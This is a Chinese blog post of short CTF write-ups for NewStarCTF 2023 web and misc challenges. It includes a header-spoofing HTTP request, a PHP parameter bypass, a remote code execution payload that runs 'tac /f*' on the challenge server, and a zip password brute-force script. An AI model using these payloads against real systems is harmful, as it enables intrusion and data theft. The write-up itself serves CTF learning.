NewstarCTF

WEB

泄漏的秘密

/robots.txt /www.zip

Begin of Upload

bp抓包改文件名上传

ErrorFlask

本来以为是算pin码,没想到报错直接泄露flag了

Begin of HTTP

POST /?ctf=1 HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-remote-IP: 127.0.0.1
X-remote-addr: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
Ali-CDN-Real-IP: 127.0.0.1
Cdn-Src-IP: 127.0.0.1
Cdn-Real-IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
Fastly-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: 127.0.0.1
Connection: close
Referer:   newstarctf.com 
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1

secret=n3wst4rCTF2023g00000d

Begin of PHP

GET:http://735dbebf-bd38-4fd3-946b-33b7268f4419.node4.buuoj.cn:81//?key1[]=1&&key2[]=2&&key4[]=1&&key5=2025a
POST:key3[]=%0a&flag5=%0a=%0a

R!C!E!

POST / HTTP/1.1
Host: d08db52d-0bd0-493d-8c74-b37fcd411d11.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://d08db52d-0bd0-493d-8c74-b37fcd411d11.node4.buuoj.cn:81
Connection: close
Referer: http://d08db52d-0bd0-493d-8c74-b37fcd411d11.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1

password=114514&&e[v.a.l=exec("tac /f*>1.txt");

然后访问1.txt

EasyLogin

爆密码

用正确密码哈希放包能抓到一个302请求,里面就是flag

MISC

CyberChef’s Secret

cyberchef magic模式

机密图片

stegsolve看图片有明显lsb痕迹,一把梭即可,zsteg -a secret.png

流量!鲨鱼!

导出所有文件,有一个.ffffllllllll11111144444GGGGGG%7cbase64,cyberchef magic即可

压缩包们

# -*- coding: utf-8 -*-
# time: 2022/11/6 11:03
# file: password-demo.py
# 公众号: 玩转测试开发
import time
import zipfile
import itertools


def extract(password, file):
    try:
        password = str(password)
        file.extractall(path='.', pwd=password.encode('utf-8'))
        print("the password is {}".format(password))
        return True
    except Exception as e:
        pass


def main(password_length):
    zip_file = zipfile.ZipFile(r"flag.zip", 'r')
    # 开始尝试
    data = "0123456789"
    num = 0
    for i in itertools.product(data, repeat=password_length):
        guess = "".join(i)
        print(f"当前密码长度:{password_length}, 猜测的密码为:{guess},尝试次数:{num}。")
        if extract(guess, zip_file):
            print(f"当前密码长度:{password_length}, 猜测的密码为:{guess}。实际密码为:{guess},尝试次数:{num},破解成功。")
            break
        num += 1


if __name__ == '__main__':
    start = time.time()
    main(6)
    end = time.time()
    print(f"破解耗时:{round(end - start, 2)}秒")

232311

空白格

https://vii5ard.github.io/whitespace/能一把梭,我写脚本做的,某国际赛签到题

def convert_text(text):
    converted_text = ""
    for char in text:
        if char == " ":
            converted_text += "0"
        elif char == "\n":
            converted_text += "2"
        elif char == "\t":
            converted_text += "1"
    return converted_text

# 读取文件
with open("white.txt", "r", encoding="utf-8") as file:
    input_text = file.read()

# 转换并输出结果
binary_string = convert_text(input_text).replace('212',"\n")
binary_string = binary_string[:-3]
binary_string = "00" + binary_string

with open("flag.txt", "w") as f:
        f.write(binary_string)
with open('flag.txt', 'r') as f:
    lines = f.readlines()
    for line in lines:
        binary_string = line.strip()
        decimal_number = int(binary_string, 2)
        ascii_character = chr(decimal_number)
        print(ascii_character, end='')

隐秘的眼睛

昨年newstarctf的老梗了,silent eye

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇